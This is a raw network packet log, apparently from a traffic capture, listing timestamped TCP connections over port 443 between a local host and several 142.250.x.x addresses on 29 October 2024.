                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.016155958 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.041989088 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.042036057 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.042128086 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.042160988 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.042742968 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.042774916 CET44349810142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.042834044 CET49810443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.882539034 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.882919073 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.882950068 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.884095907 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.884202003 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.887274981 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.887382030 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.887547970 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.887561083 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:35.929975986 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152434111 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152576923 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152678967 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152687073 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152718067 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152776957 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.152795076 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.201991081 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.202013016 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.203033924 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.203144073 CET44349812142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:36.203224897 CET49812443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:40.146725893 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:40.146774054 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:40.146902084 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:40.147164106 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:40.147178888 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.029385090 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.029717922 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.029748917 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.030817986 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.030896902 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.031184912 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.031249046 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.031346083 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.031352997 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.031402111 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.031419039 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.070941925 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307414055 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307461023 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307490110 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307516098 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307514906 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307544947 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.307571888 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.356072903 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.356111050 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.356566906 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.356692076 CET44349814142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.356769085 CET49814443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.359482050 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.359529972 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.359608889 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360080957 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360096931 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360539913 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360579014 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360627890 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360858917 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:41.360869884 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.315098047 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.315514088 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.315540075 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.315676928 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.315880060 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.315898895 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.316674948 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.316765070 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.317068100 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.317127943 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.317228079 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.317236900 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.317898989 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.317966938 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.318207026 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.318301916 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.318306923 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.359327078 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.359909058 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.360044956 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.360057116 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.407922029 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.588345051 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.588432074 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.588501930 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.588536024 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.589507103 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.589570045 CET44349815142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.589627028 CET49815443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.597906113 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.597954988 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.597985029 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.598058939 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.598073959 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.598118067 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.598231077 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.647943974 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.647964001 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.648607969 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.648816109 CET44349816142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.648922920 CET49816443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.652124882 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.652184963 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.652280092 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.652529001 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:42.652542114 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.498891115 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.499284029 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.499330044 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.500808001 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.500955105 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.501234055 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.501341105 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.501384974 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.543344975 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.554045916 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.554081917 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.602030039 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760226011 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760305882 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760356903 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760396957 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760406017 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760449886 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.760468960 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.809922934 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.809962034 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.810323000 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.810441017 CET44349817142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:43.810501099 CET49817443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:44.306341887 CET49818443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:44.306406021 CET44349818142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:44.306488991 CET49818443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:44.307005882 CET49818443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:44.307017088 CET44349818142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.197320938 CET44349818142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.197675943 CET49818443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.197714090 CET44349818142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.198084116 CET44349818142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.198415041 CET49818443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.198501110 CET44349818142.250.186.164192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:45.247924089 CET49818443192.168.2.16142.250.186.164
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:51.367553949 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:51.367610931 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:51.367727995 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:51.368262053 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:51.368278980 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.224312067 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.224757910 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.224780083 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.225833893 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.225908995 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.226370096 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.226429939 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.226541042 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.226550102 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.226603031 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.226619959 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.276897907 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810060024 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810201883 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810293913 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810336113 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810358047 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810448885 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810466051 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810615063 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810672998 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.810678005 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.818378925 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.818492889 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.818500042 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.867906094 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.867925882 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.915883064 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.927282095 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.927401066 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.927486897 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.927516937 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.930495024 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.930588961 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.930596113 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.935883045 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.935975075 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.935982943 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.947118998 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.947207928 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.947217941 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.994844913 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:52.994863987 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.042877913 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.046009064 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.074300051 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.074434042 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.074578047 CET49819443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.074596882 CET44349819142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.077212095 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.077269077 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.077341080 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.077560902 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.077583075 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.085021973 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.085072041 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.085170031 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.085608006 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.085619926 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.946152925 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.946599960 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.946618080 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.947700024 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.947805882 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.948201895 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.948276043 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.948365927 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.948378086 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.998519897 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.998985052 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.999008894 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.999011040 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:53.999808073 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.000605106 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.000685930 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.000840902 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.043334007 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.215488911 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.215567112 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.215640068 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.215672016 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.216752052 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.216799021 CET44349820142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.216856956 CET49820443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281299114 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281341076 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281420946 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281451941 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281503916 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281528950 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281596899 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281605005 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281651020 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.281656981 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.290728092 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.290879965 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.290919065 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.332849026 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.332880020 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.380887032 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.402975082 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.403048992 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.403110027 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.403136969 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.418771982 CET44349821142.250.186.68192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.418955088 CET49821443192.168.2.16142.250.186.68
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:10:54.418982983 CET44349821142.250.186.68192.168.2.16
